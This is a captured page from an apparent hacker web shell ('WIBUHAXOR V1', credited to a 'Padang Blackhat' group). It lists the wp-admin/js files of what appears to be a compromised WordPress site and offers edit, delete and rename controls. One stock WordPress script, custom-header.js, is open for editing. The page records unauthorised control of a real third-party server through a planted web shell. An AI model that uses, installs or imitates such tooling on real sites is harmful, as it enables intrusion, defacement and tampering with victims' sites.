-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
rohihbs.com
/
wp-admin
/
js
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
widgets
--
NONE
auth-app.min.js
2.035KB
Edit File
Delete File
Rename
code-editor.js
11.316KB
Edit File
Delete File
Rename
code-editor.min.js
3.011KB
Edit File
Delete File
Rename
color-picker.min.js
3.404KB
Edit File
Delete File
Rename
comment.min.js
1.284KB
Edit File
Delete File
Rename
common.js
61.15KB
Edit File
Delete File
Rename
custom-header.js
1.976KB
Edit File
Delete File
Rename
customize-controls.js
287.36KB
Edit File
Delete File
Rename
customize-controls.min.js
109.14KB
Edit File
Delete File
Rename
customize-nav-menus.js
111.131KB
Edit File
Delete File
Rename
customize-nav-menus.min.js
46.929KB
Edit File
Delete File
Rename
customize-widgets.js
70.046KB
Edit File
Delete File
Rename
customize-widgets.min.js
27.407KB
Edit File
Delete File
Rename
edit-comments.js
37.115KB
Edit File
Delete File
Rename
editor.js
43.98KB
Edit File
Delete File
Rename
farbtastic.js
7.665KB
Edit File
Delete File
Rename
gallery.min.js
3.653KB
Edit File
Delete File
Rename
image-edit.js
39.977KB
Edit File
Delete File
Rename
inline-edit-post.js
20.166KB
Edit File
Delete File
Rename
inline-edit-post.min.js
9.413KB
Edit File
Delete File
Rename
inline-edit-tax.js
7.614KB
Edit File
Delete File
Rename
inline-edit-tax.min.js
2.927KB
Edit File
Delete File
Rename
iris.min.js
23.089KB
Edit File
Delete File
Rename
language-chooser.min.js
0.413KB
Edit File
Delete File
Rename
media-gallery.js
1.272KB
Edit File
Delete File
Rename
media-gallery.min.js
0.597KB
Edit File
Delete File
Rename
media-upload.min.js
1.125KB
Edit File
Delete File
Rename
media.js
6.606KB
Edit File
Delete File
Rename
media.min.js
2.382KB
Edit File
Delete File
Rename
nav-menu.min.js
29.847KB
Edit File
Delete File
Rename
password-strength-meter.min.js
1.097KB
Edit File
Delete File
Rename
password-toggle.js
1.308KB
Edit File
Delete File
Rename
post.js
38.679KB
Edit File
Delete File
Rename
post.min.js
18.403KB
Edit File
Delete File
Rename
postbox.min.js
6.603KB
Edit File
Delete File
Rename
privacy-tools.min.js
5.033KB
Edit File
Delete File
Rename
revisions.min.js
17.97KB
Edit File
Delete File
Rename
set-post-thumbnail.min.js
0.605KB
Edit File
Delete File
Rename
site-health.js
13.149KB
Edit File
Delete File
Rename
site-health.min.js
6.135KB
Edit File
Delete File
Rename
site-icon.min.js
2.201KB
Edit File
Delete File
Rename
svg-painter.js
3.203KB
Edit File
Delete File
Rename
svg-painter.min.js
1.53KB
Edit File
Delete File
Rename
tags-box.js
10.879KB
Edit File
Delete File
Rename
tags-box.min.js
3.005KB
Edit File
Delete File
Rename
tags-suggest.js
5.636KB
Edit File
Delete File
Rename
tags-suggest.min.js
2.216KB
Edit File
Delete File
Rename
tags.js
4.851KB
Edit File
Delete File
Rename
tags.min.js
2.042KB
Edit File
Delete File
Rename
theme-plugin-editor.js
24.766KB
Edit File
Delete File
Rename
theme-plugin-editor.min.js
11.435KB
Edit File
Delete File
Rename
theme.min.js
26.417KB
Edit File
Delete File
Rename
updates.js
109.335KB
Edit File
Delete File
Rename
updates.min.js
47.272KB
Edit File
Delete File
Rename
user-profile.min.js
6.701KB
Edit File
Delete File
Rename
user-suggest.min.js
0.66KB
Edit File
Delete File
Rename
widgets.js
22.557KB
Edit File
Delete File
Rename
word-count.min.js
1.494KB
Edit File
Delete File
Rename
xfn.js
0.723KB
Edit File
Delete File
Rename
xfn.min.js
0.447KB
Edit File
Delete File
Rename
/** * @output wp-admin/js/custom-header.js */ /* global isRtl */ /** * Initializes the custom header selection page. * * @since 3.5.0 * * @deprecated 4.1.0 The page this is used on is never linked to from the UI. * Setting a custom header is completely handled by the Customizer. */ (function($) { var frame; $( function() { // Fetch available headers. var $headers = $('.available-headers'); // Apply jQuery.masonry once the images have loaded. $headers.imagesLoaded( function() { $headers.masonry({ itemSelector: '.default-header', isRTL: !! ( 'undefined' != typeof isRtl && isRtl ) }); }); /** * Opens the 'choose from library' frame and creates it if it doesn't exist. * * @since 3.5.0 * @deprecated 4.1.0 * * @return {void} */ $('#choose-from-library-link').on( 'click', function( event ) { var $el = $(this); event.preventDefault(); // If the media frame already exists, reopen it. if ( frame ) { frame.open(); return; } // Create the media frame. frame = wp.media.frames.customHeader = wp.media({ // Set the title of the modal. title: $el.data('choose'), // Tell the modal to show only images. library: { type: 'image' }, // Customize the submit button. button: { // Set the text of the button. text: $el.data('update'), // Tell the button not to close the modal, since we're // going to refresh the page when the image is selected. close: false } }); /** * Updates the window location to include the selected attachment. * * @since 3.5.0 * @deprecated 4.1.0 * * @return {void} */ frame.on( 'select', function() { // Grab the selected attachment. var attachment = frame.state().get('selection').first(), link = $el.data('updateLink'); // Tell the browser to navigate to the crop step. window.location = link + '&file=' + attachment.id; }); frame.open(); }); }); }(jQuery));
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat